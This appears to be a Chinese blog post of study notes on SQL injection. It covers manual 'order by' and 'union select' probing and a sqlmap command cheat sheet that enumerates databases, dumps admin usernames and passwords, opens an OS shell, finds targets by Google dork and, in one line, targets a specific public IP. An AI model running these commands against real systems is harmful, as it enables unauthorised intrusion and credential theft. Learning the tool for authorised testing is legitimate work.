?id order by 11 意思测试当前表是否有第11个字段 如果有执行sql就不会报错。
union selec 1,2 如果有两个字段 就不会sql报错。 可以更改2的位置 为database() 显示当前表所在的库是多少
+号 代表空格
modHeader 插件 可以修改请求头信息再发出请求
kali中sqlmap 的使用
sqlmap -u http://xxx.xx.xx.xx:xxx/?id=1 --dbs 查询库
sqlmap -u http://xxx.xx.xx.xx:xxx/?id=1 --tables 查询表
sqlmap -u “http://117.41.229.122:8003/?id=1” --columns -T admin
查询表的列
- get 请求
$ python sqlmap.py -u "http://127.0.0.1/index.php?id=1" // 测试该注入点是否能够进行注入
$ python sqlmap.py -u "http://127.0.0.1/index.php?id=1" --dbs // 对注入点进行注入,并导出数据库名
$ python sqlmap.py -u "http://127.0.0.1/index.php?id=1" -D database --tables // 对database这个数据库进行表的猜测
$ python sqlmap.py -u "http://127.0.0.1/index.php?id=1" -D database -T admin --columns // 对database下的admin表中字段进行猜测
$ python sqlmap.py -u "http://127.0.0.1/index.php?id=1" -D database -T admin -C user,password --dump
// 对database下的admin表中user和password字段进行猜测并dump
post 请求
$ python sqlmap.py -r header.txt
$ python sqlmap.py -r header.txt --dbs
...
// -r是从一个文件中载入HTTP请求
// 其余都与GET一样将-u部分改成-r
// header.txt
POST /index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/index.php
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 18
id=1
cookie
$ python sqlmap.py -u "http://127.0.0.1/index.php" --cookie="id=1" --level=2
...
// 其余与GET一样,别忘记加上--cookie参数
其他
$ python sqlmap.py -u "http://127.0.0.1/index.php?id=1" --os-shell // 获取远程主机的shell
$ python sqlmap.py -u "http://127.0.0.1/index.php?id=1" --os-cmd="whoami" // 执行远程主机的命令
$ python sqlmap.py -u "http://127.0.0.1/index.php?id=1" --is-dba // 检查DBMS用户是否为DBA
$ python sqlmap.py -g "inurl:php?id=" // 通过google寻找url带有php?id=字段的地址
-D 库名 -T 表名 --dump --thread=2 开两个线程查 库名中的这个表的信息
-delay 1 一秒发一次请求
先判断 是数字型还是字符型 数字型 3-1 和2 页面 一样 字符型 3-1 的页面和3的一样
547
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
